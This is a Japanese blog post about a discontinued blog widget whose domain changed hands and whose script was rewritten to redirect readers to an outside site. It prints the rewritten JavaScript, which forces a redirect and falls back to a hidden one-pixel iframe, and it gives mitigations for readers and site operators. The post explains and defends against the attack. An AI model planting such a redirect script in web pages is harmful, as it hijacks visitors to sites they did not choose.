リダイレクトされてサイト乗っ取られたかなぁと思ったら、ブログパーツも確認したほうがよい

たまに見に行っていたブログが、リダイレクトされて海外サイトに飛ぶのでおかしいなぁと思ってちょっと調べたら、ブログパーツの中のコードが書き換えられていました。

※安全の為、example.com等に一部書き換えてあります。

<script type="text/javascript" src="http://tools.example.com/example.js"></script>

jayascriptを貼るタイプのブログパーツですね。

で中身を確認すると以下のようになっていました。
/*
    NOTICE! You've requested a file that is not available for remote inclusion.
*/
try{
    window.location = 'http://welcome.example.com';
}catch(e){
    var rframe = document.createElement("iframe");
    rframe.setAttribute('width','1px');
    rframe.setAttribute('height','1px');
    rframe.setAttribute('frameborder','0');
    rframe.setAttribute('id','rfx');
    rframe.setAttribute('src','http://welcome.example.com');
    document.body.appendChild(rframe);
}

こんな感じになっているので、表示させると、http://welcome.example.comにリダイレクトされるんですな。リダイレクト先は、ブログパーツを置いているドメイン以外のところにも当然飛ばすことが可能です。

「 NOTICE! You've requested a file that is not available for remote inclusion.」で検索するとそれらしい被害?がヒットします。

WordPress › Support » Somthing wrong with remote inclusion

上記は、Wordpressの事例かと思う。

閲覧側の対策

どうしても、閲覧したい場合は、該当するブログパーツのURLをブロックしてください。
今回だと、tools.example.comをブロックすれば、ブログパーツ自体読み込まれませんので、とりあえずは以前のように読めます。

サイト運営側の対策

無料系のブログだと、ブログパーツあたりを疑うのが妥当だと思います。
Wordpressだと、それ以外にもいろいろあるので、少しずつ切り分けるしかないかと思います。

サービスが終了したブログパーツは、さっさと撤去するに限ると思います。
サービスを提供していたドメインを手放されると、たいていこういう感じのことに利用されるようなので・・・。
それも忘れたころに??

アメブロで、以前話題になっていたので・・・

以下のようなのを以前読んでいたので、ブログパーツが怪しいんじゃないかなと思ったわけです。
無料ブログ系で出来る範囲は少ないために、このあたりしかありえないというのもあろうかとは思います。

現在、ブログを閲覧すると自動的に他サイトへリンクしてしまう
という報告を多数いただいております。

調査させていただいた所、下記フリープラグインが原因となっており、
Amebaのサービスではないため、対応することができません。
※追記あり【ブログ】ブログ閲覧時における不具合について|スタッフブログ


ブログチャームblogcharm.jpドメイン所有者が変わって不審なリダイレクト・・・

だいぶ前の2011年にサービス終了したというブログチャーム(blogcharm .jp)なるブログパーツを提供してたJPドメインの所有者が別人になり。。。


【ブログ】ブログ閲覧時における不具合について (Ameba)
http://ameblo.jp/staff/entry-11513166904.html

【ブログ】blog Charmご利用の皆様へご連絡
http://ameblo.jp/staff/entry-11513776010.html


「blog Charm」については、
サイバーエージェント関連会社であるサイバーバズが提供しているサービスでございました。
※このサービスは、2011年6月30日に終了しております。
ブログチャームblogcharm.jpドメイン所有者が変わって不審なリダイレクト・・・ - 無題な濃いログ - Yahoo!ブログ


事例

乗っ取られたのかも・・・ - FC2ユーザーフォーラム
サイトが乗っ取られた!?スパムコメントで海外サイトにリダイレクトされていた話 | TechMemo

スポンサーリンク

コメントを残す

メールアドレスは公開されません。
また、コメント欄には、必ず日本語を含めてください(スパム対策)。